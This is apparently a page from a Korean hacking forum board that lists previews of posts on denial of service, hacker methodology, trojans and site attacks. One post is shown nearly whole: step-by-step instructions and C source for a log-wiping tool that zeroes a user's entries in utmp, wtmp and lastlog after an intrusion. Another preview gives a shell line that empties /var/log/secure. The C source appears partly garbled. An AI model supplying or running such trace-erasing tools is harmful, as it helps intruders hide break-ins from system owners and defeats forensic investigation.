시큐리티 (레벨5이상) 11 페이지

본문 바로가기

검색취소

시큐리티 (레벨5이상)

검색 이전 다음
  • no image
  • 서비스 거부 공격(Denial of Service Attack)

    차를 몰아본 경험이 없는 사람이라 하여도, 출퇴근길 뿐만 아니라 시도 때도 없이 막히는 서울의 교통체증은 누구나 다 아는 이야기이다. 이러한 체증의 원인 중에 하나가 "병목현상"이란 단어로 설명될 …

  • no image
  • 해커들의 해커순서

    공격 목표 시스템 정보 수집       - 자동화된 대규모 네트워크 스캔 도구를 이용한 정보 수집       - 네트워크 구조, 운영체계 버전, 취약점 정보 등 수집   불법적인 컴퓨터 접근     - ID와 패스…

  • no image
  • 해킹기법

    ① 트로이 목마(Trojan Horse) -------------------------------------------------------------------------------- 트로이 목마(Trojan Ho…

  • no image
  • 해킹이란?

    해커라는 단어는 60년대 미국 M.I.T 대학생들을 시작으로 전파되기시작하였습니다. 그들은 컴퓨터를 광적으로 좋아하고 그들의 이상을 컴퓨터에걸었습니다. 밤낮으로 컴퓨터에 매달려 새로운 프로그램을 만들고 토론하며창…

  • no image
  • 해킹후 로그파일 삭제하기

    쉘파일을 아래와 같이 만듭니다. cp -f /dev/null /var/log/secure(이런식으로 여기에는 로그파일을적습니다.) 위와 같이 쉘파일을 만들어서 chmod 755 파일명(이런식으로 실행권한을 부여합니다…

  • no image
  • 리눅스 사용로그지우기

    /etc/utmp, /usr/adm/wtmp와 /usr/adm/lastlog 파일을 변경한다. 이것들은 텍스트 파일이 아니라 서 vi로 편집할 수 없다. 특별한 목적을 지닌 프로그램을 작성해야 한다. #inclu…

  • no image
  • 유닉스 & 인터넷 그리고 해킹

    @인터넷 & 유닉스의 이해 인터넷(Internet)이란 전세계적인 통신망이란 사실은 이미 알고있을것이다. 우리나라에만 하이텔,천리안,나우컴..... 무수한 통신망이 존재한다. 인터넷이란 이런 각종 통신망이 하나로 연…

  • no image
  • 해킹당한 서버에서 확인해야할일

    해킹 피해시스템 분석 절차   이 문서는 시스템이 침입을 당했을 경우 유닉스 시스템의 보안을 위해 무엇을 할 것인가를 알려준다. 또한 아직 침입을 당하지 않은 상태라도 시스템 보안점검에 도움이 된다. 1. 해…

  • no image
  • 해커들이 자신의 흔적을 지우는 방법

    자신의 로긴 정보를 지우는 프로그램은 기본적으로 /etc/utmp와 /var/adm/wtmp와 /var/adm/lastlog에 대한 읽기와 쓰기권한이 있어야 합니다. SunOS 4.1.X계열의 utmp의 모드가 -rw-rw-rw-로 되어 있고 SunOS 5.X 계열의 utmp의 모드는 -rw-r-r-로 되어 있습니다. 시스템에 따라 다를 수도 있지요. 따라서, 이 프로그램을 실행해 보려고 하는 사람은 SunOS 4.1.X을 사용해야 합니다. 이는 uname -a의 명령어로 알아 볼 수 있습니다. 그런데 자신이 일반 사용자가 아닌 root라면 구지 OS의 버전에 영향을 받을 필요가 없습니다. 해커나 다른 사람이 접속하면 시스템에 /etc/utmp, /usr/adm/wtmp와 /usr/adm/lastlog 파일에 접속 기록이 남습니다. 그래서 흔적을 없애기 위해서는 위의 화일을 변경합니다. 이것들은 텍스트 파일이 아니라서 vi로 편집할 수 없고 특별한 목적을 지닌 프로그램을 작성해야 합니다. 바로 그 프로그램이 아래에 있는 프로그램입니다. C언어로 작성 되어 있습니다. 이 프로그램 말고도 여러 가지의 흔적 지우는 프로그램이 있다는 것을 알려드립니다. 아래 프로그램을 root의 권한에서 돌려서 접속흔적을 지웁니다. 유닉스 쉘 상태에서 아래 파일명을 test.c로 저장해서 cc -o rmuser test.c 로 컴파일 해서 rmuser를 실행시키면 됩니다. hack -o rmuser test.c hack%rmuser 위의 명령을 실행해서 who라고 명령 해보십시오. 깜쪽 같이 자신이 사라져 있을 겁니다. 참고로 who는 현재 시스템에 로긴해 있는 사용자를 알아보는 명령어 입니다. 프로그램 소스 tset.c의 내용 #include #include #include #include #include #include #include #include #define WTMP_NAME "/usr/adm/wtmp" #define UTMP_NAME "/etc/utmp" #define LASTLOG_NAME "/usr/adm/lastlog" int f; void kill_utmp(who) char *who; { struct utmp utmp_ent; if ((f=open(UTMP_NAME,O_RDWR))>=0) { while(read (f, &utmp_ent, sizeof (utmp_ent))> 0 ) if (!strncmp(utmp_ent.ut_name,who,strlen(who))) { bzero((char *)&utmp_ent,sizeof( utmp_ent )); lseek (f, -(sizeof (utmp_ent)), SEEK_CUR); write (f, &utmp_ent, sizeof (utmp_ent)); } close(f); } } void kill_wtmp(who) char *who; { struct utmp utmp_ent; long pos; pos = 1L; if ((f=open(WTMP_NAME,O_RDWR))>=0) { while(pos != -1L) { lseek(f,-(long)( (sizeof(struct utmp)) * pos),L_XTND); if (read (f, &utmp_ent, sizeof (struct utmp))= 0) { lseek(f, (long)pwd->pw_uid * sizeof (struct lastlog), 0); bzero((char *)&newll,sizeof( newll )); write(f, (char *)&newll, sizeof( newll )); close(f); } } else printf("%s: ?\\n",who); } main(argc,argv) int argc; char *argv[]; { if (argc==2) { kill_lastlog(argv[1]); kill_wtmp(argv[1]); kill_utmp(argv[1]); printf("Zap2!\\n"); } else printf("Error.\\n"); }

  • no image
  • 나비를 알아보자

    나비란 기존의 아미에서 새롭게 뜨고있는 한글입력이 될수있게하는 플그램입니다. 우선 실행은 nabi라고 하면 됩니다. 그전에 몇가지 간단한 설정을 해주셔야 사용하실 수 있습니다. 우선은 확인부터 해보죠.. 리눅스에서 …

  • no image
  • 개인용 컴퓨터로부터 이루어지는 해킹2

    아래의 내용은 평소 제가 생각하고 있는 것을 글로 적은것 입니다. 만일 수정되어야 할 부분이 있다면 메일주세요. 흔히 인터넷을 모르시는 분들은 "인터넷 그냥 브라우저 실행시켜서 주소만 입력하면 되는것아냐.…

  • no image
  • 개인용 컴퓨터로부터 이루어지는 해킹

    아래의 내용은 평소 제가 생각하고 있는 것을 글로 적은것 입니다. 만일 수정되어야 할 부분이 있다면 메일주세요. 흔히 인터넷을 모르시는 분들은 "인터넷 그냥 브라우저 실행시켜서 주소만 입력하면 되는것아냐.…

  • no image
  • 일반사이트 공략법!!! ( HTTP BASIC ATTACK )

    드디어 실제적인 사이트 공략법을 배워보실 차례입니다. 처음부터 차근차근히 읽어내려 오셨다면 기대가 크시겠네요.. 기대에 부흥을 할 수 있을런지.... 웹서핑을 하다보면 수많은 유료사이트들을 접하게 됩니다. 그 수많은…

이 게시판은 레벨3이상 읽기,쓰기 가능한 게시판입니다. 커뮤니티 활동등을 통해 신분이 확인된 분에 한해서 진입가능합니다.
보안 관련 된 글을 많이 남겨주세요.. 특히 외부에 제목만 공개되므로 자유롭게 등록가능합니다.
?>